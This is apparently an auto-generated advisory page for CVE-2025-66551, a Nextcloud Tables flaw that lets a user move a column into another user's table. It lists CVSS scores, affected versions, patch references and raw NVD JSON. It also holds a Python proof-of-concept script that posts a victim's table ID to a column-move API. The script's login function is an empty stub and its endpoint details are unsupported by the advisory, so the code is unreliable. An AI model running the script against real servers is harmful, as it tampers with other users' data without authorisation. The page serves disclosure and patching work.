Security Vulnerability Report
CVE-2025-66551 CVSS 6.3 MEDIUM

Published: 2025-12-05 18:15:58
Last Modified: 2025-12-09 17:07:34

Description

Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.6 and 0.9.3, a malicious user was able to create their own table and then move a column to a victim's table. This vulnerability is fixed in 0.8.6 and 0.9.3.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* - VULNERABLE (versions 0.4.0 up to, but excluding, 0.8.6)
cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* - VULNERABLE (versions 0.9.0 up to, but excluding, 0.9.3)
Nextcloud Tables >= 0.4.0, < 0.8.6
Nextcloud Tables >= 0.9.0, < 0.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-66551 PoC - Nextcloud Tables Column Move Exploitation
# This PoC demonstrates how a malicious user can move a column to a victim's table
import requests
import json

# Configuration
NEXTCLOUD_URL = "https://vulnerable-nextcloud-instance.com"
ATTACKER_TOKEN = "attacker_auth_token_here"
ATTACKER_TABLE_ID = "attacker_table_id_here"
ATTACKER_COLUMN_ID = "column_id_to_move_here"
VICTIM_TABLE_ID = "victim_table_id_here"


# Step 1: Authenticate as attacker
def authenticate(username, password):
    """Authenticate and get session token"""
    session = requests.Session()
    login_url = f"{NEXTCLOUD_URL}/login"
    # Implementation depends on Nextcloud auth mechanism
    return session


# Step 2: Move column to victim's table
def move_column_to_victim(session, column_id, target_table_id):
    """Move attacker's column to victim's table - the vulnerability exploit"""
    api_url = f"{NEXTCLOUD_URL}/apps/tables/api/v1/column/move"
    headers = {
        "OCS-APIRequest": "true",
        "Content-Type": "application/json",
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
    }
    # Malicious payload - targeting victim's table
    payload = {
        "columnId": column_id,
        "tableId": target_table_id,  # Victim's table ID - no ownership check!
    }
    response = session.post(api_url, json=payload, headers=headers)
    if response.status_code == 200:
        print(f"[SUCCESS] Column {column_id} moved to table {target_table_id}")
        return True
    else:
        print(f"[FAILED] Status: {response.status_code}")
        print(f"Response: {response.text}")
        return False


# Step 3: Verify the column was moved
def verify_column_move(session, column_id):
    """Verify column is now in victim's table"""
    api_url = f"{NEXTCLOUD_URL}/apps/tables/api/v1/column/{column_id}"
    headers = {
        "OCS-APIRequest": "true",
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
    }
    response = session.get(api_url, headers=headers)
    if response.status_code == 200:
        data = response.json()
        print(f"Column {column_id} now belongs to table: {data.get('tableId')}")


if __name__ == "__main__":
    session = authenticate("attacker_user", "attacker_password")
    move_column_to_victim(session, ATTACKER_COLUMN_ID, VICTIM_TABLE_ID)
    verify_column_move(session, ATTACKER_COLUMN_ID)
```

References

https://github.com/nextcloud/security-advisories/security/advisories/GHSA-w787-vwqp-8wr7 (Vendor Advisory)
https://github.com/nextcloud/tables/commit/39f24a62fb41fd7a8bda65325f8bbafdc91c731c (Patch)
https://github.com/nextcloud/tables/pull/1810 (Issue Tracking, Patch)
https://hackerone.com/reports/3137895 (Issue Tracking, Vendor Advisory)

Weakness: CWE-639

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66551",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-05T18:15:58.300",
    "lastModified": "2025-12-09T17:07:34.003",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.6 and 0.9.3, a malicious user was able to create their own table and then move a column to a victims table. This vulnerability is fixed in 0.8.6 and 0.9.3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:L",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 4.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-639"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*",
                "versionStartIncluding": "0.4.0",
                "versionEndExcluding": "0.8.6",
                "matchCriteriaId": "DA8A7C61-CBE2-432E-80B0-04F02CE23CE8"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*",
                "versionStartIncluding": "0.9.0",
                "versionEndExcluding": "0.9.3",
                "matchCriteriaId": "6648795E-ED71-4554-AEFA-E707CD7AC7E0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-w787-vwqp-8wr7",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "https://github.com/nextcloud/tables/commit/39f24a62fb41fd7a8bda65325f8bbafdc91c731c",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/nextcloud/tables/pull/1810",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://hackerone.com/reports/3137895",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Vendor Advisory"]
      }
    ]
  }
}
```